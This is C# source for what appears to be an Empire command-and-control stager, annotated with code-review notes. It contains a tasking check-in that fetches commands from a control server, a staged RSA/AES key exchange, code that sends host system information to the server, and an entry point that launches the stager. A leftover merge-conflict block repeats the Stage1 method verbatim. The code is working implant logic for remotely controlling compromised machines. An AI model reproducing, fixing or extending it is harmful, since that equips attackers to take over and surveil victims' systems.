////////////////////////////////////////////////////////////////////////////////
// GetTask: one tasking check-in against the currently selected control server.
//
// Builds a routing packet via NewRoutingPacket(null, 4) (the meaning of the
// second argument is defined by that helper and is not visible here),
// base64-encodes it and sends it as the "session" cookie, then performs an
// HTTP GET of GetControlServers()[ServerIndex] + <one task URI picked at random
// from GetTaskURIs()>.  The request goes through the system proxy with default
// credentials and carries the User-Agent supplied by sessionInfo.
//
// Returns the raw response body, or an empty byte[] when the request raised a
// WebException (MissedCheckins is incremented on that path).
//
// NOTE(review): webException.Response is null for WebExceptions that never got
// an HTTP response (name resolution failure, connection refused, timeout); the
// cast then yields null and ".StatusCode" throws a NullReferenceException that
// is not caught here.  The 401 branch is an empty TODO.  WebClient is
// IDisposable but is never disposed, and a new System.Random is created on
// every call.
////////////////////////////////////////////////////////////////////////////////
internal byte[] GetTask() {
    // Default result: empty body on any handled failure.
    byte[] results = new byte[0];
    try {
        byte[] routingPacket = NewRoutingPacket(null, 4);
        string routingCookie = Convert.ToBase64String(routingPacket);
        WebClient webClient = new WebClient();
        // Follow the host's proxy configuration, authenticating with the current credentials.
        webClient.Proxy = WebRequest.GetSystemWebProxy();
        webClient.Proxy.Credentials = CredentialCache.DefaultCredentials;
        webClient.Headers.Add("User-Agent", sessionInfo.GetUserAgent());
        // The routing packet travels in the "session" cookie.
        webClient.Headers.Add("Cookie", "session=" + routingCookie);
        Random random = new Random();
        // GetTaskURIs() is evaluated twice; one URI is chosen uniformly at random.
        string selectedTaskURI = sessionInfo.GetTaskURIs()[random.Next(0, sessionInfo.GetTaskURIs().Length)];
        results = webClient.DownloadData(sessionInfo.GetControlServers()[ServerIndex] + selectedTaskURI);
    }
    catch (WebException webException) {
        MissedCheckins++;
        // NOTE(review): Response may be null here (see header comment); the cast
        // and member access below are not guarded.
        if ((int)((HttpWebResponse)webException.Response).StatusCode == 401) {
            //Restart everything
        }
    }
    return(results);
}
////////////////////////////////////////////////////////////////////////////////
// Stage2: second staging round trip.
//
// stage1response is RSA-decrypted with rsaCrypto.Decrypt(..., false).  On
// RSACryptoServiceProvider that bool is fOAEP, so false selects PKCS#1 v1.5
// padding -- confirm rsaCrypto's actual type.  The ASCII plaintext is split as
// [0,16) = nonce and [16,end) = session key; the key is stored in sessionInfo
// and its ASCII bytes become the AES/HMAC key for the rest of this method.
// The nonce is parsed as an Int64, incremented, and prefixed as "nonce|" to the
// system-information blob from GetSystemInformation(...).  That blob is
// AES-encrypted with a fresh 16-byte IV and framed as
//   IV || ciphertext || HMAC-SHA256(sessionKey, IV || ciphertext)[0..10)
// then handed to SendStage(0x03, ..., "/index.php").
//
// Returns whatever SendStage returns.
// Throws: ArgumentOutOfRangeException if the plaintext is shorter than 16 chars
// (Substring); FormatException/OverflowException if the nonce is not a valid
// Int64 (Convert.ToInt64); plus whatever rsaCrypto.Decrypt raises.
//
// NOTE(review): the IV comes from System.Random, which is not a
// cryptographically secure generator; the HMAC tag is truncated to 10 bytes
// (80 bits).
////////////////////////////////////////////////////////////////////////////////
private byte[] Stage2(byte[] stage1response) {
    Random random = new Random();
    // --- Recover nonce and session key from the stage-1 reply -----------------
    byte[] decrypted = rsaCrypto.Decrypt(stage1response, false);
    string decryptedString = Encoding.ASCII.GetString(decrypted);
    string nonce = decryptedString.Substring(0, 16);
    sessionInfo.SetSessionKey(decryptedString.Substring(16, decryptedString.Length - 16));
    byte[] keyBytes = Encoding.ASCII.GetBytes(sessionInfo.GetSessionKey());
    // --- Increment the nonce and encrypt the system-information blob ---------
    long increment = Convert.ToInt64(nonce);
    increment++;
    nonce = increment.ToString();
    byte[] systemInformationBytes = GetSystemInformation(nonce + "|", string.Join(",", sessionInfo.GetControlServers()));
    byte[] initializationVector = new byte[16];
    random.NextBytes(initializationVector);  // NOTE(review): System.Random, not a CSPRNG
    byte[] encryptedInformationBytes = aesEncrypt(keyBytes, initializationVector, systemInformationBytes);
    // IV is prepended so the receiver can recover it.
    encryptedInformationBytes = Misc.combine(initializationVector, encryptedInformationBytes);
    // --- Append a truncated HMAC over IV || ciphertext ------------------------
    using (HMACSHA256 hmac = new HMACSHA256()) {
        hmac.Key = keyBytes;
        byte[] hmacHash = hmac.ComputeHash(encryptedInformationBytes).Take(10).ToArray();
        encryptedInformationBytes = Misc.combine(encryptedInformationBytes, hmacHash);
    }
    // --- Send as stage 3 ------------------------------------------------------
    return(SendStage(0x03, encryptedInformationBytes, "/index.php"));
}
<<<<<<< REPLACE
////////////////////////////////////////////////////////////////////////////////
// Stage1: first staging round trip.
//
// Serializes the RSA public key (ToXmlString(false) = without private
// parameters) as ASCII, AES-encrypts it under stagingKeyBytes with a fresh
// 16-byte IV, frames it as
//   IV || ciphertext || HMAC-SHA256(stagingKey, IV || ciphertext)[0..10)
// and hands it to SendStage(0x02, ..., <first control server> + "/index.jsp").
// Presumably the reply is the stage1response that Stage2 decrypts with the
// matching private key -- inferred from the method names, confirm against
// SendStage and the caller.
//
// Returns whatever SendStage returns.
//
// NOTE(review): HMACSHA256 is IDisposable but is not disposed here (Stage2
// wraps its instance in `using`); the IV comes from System.Random, which is
// not a cryptographically secure generator; the HMAC tag is truncated to
// 10 bytes (80 bits).
////////////////////////////////////////////////////////////////////////////////
private byte[] Stage1() {
    Random random = new Random();
    // --- Public key as ASCII XML -----------------------------------------------
    string rsaKey = rsaCrypto.ToXmlString(false);
    byte[] rsaKeyBytes = Encoding.ASCII.GetBytes(rsaKey);
    // --- AES-encrypt under the staging key, IV prepended ------------------------
    byte[] initializationVector = new byte[16];
    random.NextBytes(initializationVector);  // NOTE(review): System.Random, not a CSPRNG
    byte[] encryptedBytes = aesEncrypt(stagingKeyBytes, initializationVector, rsaKeyBytes);
    encryptedBytes = Misc.combine(initializationVector, encryptedBytes);
    // --- Append a truncated HMAC over IV || ciphertext --------------------------
    HMACSHA256 hmac = new HMACSHA256();  // NOTE(review): not disposed
    hmac.Key = stagingKeyBytes;
    byte[] hmacBytes = hmac.ComputeHash(encryptedBytes);
    encryptedBytes = Misc.combine(encryptedBytes, hmacBytes.Take(10).ToArray());
    // --- Send as stage 2 to the first control server ----------------------------
    return(SendStage(0x02, encryptedBytes, sessionInfo.GetControlServers().First() + "/index.jsp"));
}
=======
////////////////////////////////////////////////////////////////////////////////
// Stage1: first staging round trip.
//
// Serializes the RSA public key (ToXmlString(false) = without private
// parameters) as ASCII, AES-encrypts it under stagingKeyBytes with a fresh
// 16-byte IV, frames it as
//   IV || ciphertext || HMAC-SHA256(stagingKey, IV || ciphertext)[0..10)
// and hands it to SendStage(0x02, ..., <first control server> + "/index.jsp").
// Presumably the reply is the stage1response that Stage2 decrypts with the
// matching private key -- inferred from the method names, confirm against
// SendStage and the caller.
//
// Returns whatever SendStage returns.
//
// NOTE(review): HMACSHA256 is IDisposable but is not disposed here (Stage2
// wraps its instance in `using`); the IV comes from System.Random, which is
// not a cryptographically secure generator; the HMAC tag is truncated to
// 10 bytes (80 bits).
////////////////////////////////////////////////////////////////////////////////
private byte[] Stage1() {
    Random random = new Random();
    // --- Public key as ASCII XML -----------------------------------------------
    string rsaKey = rsaCrypto.ToXmlString(false);
    byte[] rsaKeyBytes = Encoding.ASCII.GetBytes(rsaKey);
    // --- AES-encrypt under the staging key, IV prepended ------------------------
    byte[] initializationVector = new byte[16];
    random.NextBytes(initializationVector);  // NOTE(review): System.Random, not a CSPRNG
    byte[] encryptedBytes = aesEncrypt(stagingKeyBytes, initializationVector, rsaKeyBytes);
    encryptedBytes = Misc.combine(initializationVector, encryptedBytes);
    // --- Append a truncated HMAC over IV || ciphertext --------------------------
    HMACSHA256 hmac = new HMACSHA256();  // NOTE(review): not disposed
    hmac.Key = stagingKeyBytes;
    byte[] hmacBytes = hmac.ComputeHash(encryptedBytes);
    encryptedBytes = Misc.combine(encryptedBytes, hmacBytes.Take(10).ToArray());
    // --- Send as stage 2 to the first control server ----------------------------
    return(SendStage(0x02, encryptedBytes, sessionInfo.GetControlServers().First() + "/index.jsp"));
}
>>>>>>> END
// Entry point.  Which SessionInfo constructor runs is chosen by compile-time
// symbols:
//   COMMAND_LINE : requires at least 3 command-line args, otherwise returns
//                  silently; constructs SessionInfo(args).
//   COMPILE_TIME : constructs the parameterless SessionInfo().
//   PRINT        : additionally echoes the control servers, staging key and
//                  agent language to stdout.
// It then runs EmpireStager(sessionInfo).Execute().
//
// NOTE(review): exactly one of COMMAND_LINE / COMPILE_TIME must be defined --
// with neither, sessionInfo is undeclared; with both, it is declared twice.
// GetControlServers() is indexed and string.Join'ed elsewhere in this file, so
// it is a collection; formatting an array with "{0}" prints its type name
// rather than its elements.
static void Main(string[] args) {
#if (COMMAND_LINE)
    // Too few arguments: exit without running the stager.
    if (args.Length < 3) {
        return;
    }
    SessionInfo sessionInfo = new SessionInfo(args);
#endif
#if (COMPILE_TIME)
    SessionInfo sessionInfo = new SessionInfo();
#endif
#if (PRINT)
    // Diagnostic output; the staging key is written to stdout when PRINT is set.
    Console.WriteLine("EmpireServer: {0}", sessionInfo.GetControlServers());
    Console.WriteLine("StagingKey: {0}", sessionInfo.GetStagingKey());
    Console.WriteLine("AgentLanguage: {0}", sessionInfo.GetAgentLanguage());
#endif
    (new EmpireStager(sessionInfo)).Execute();
}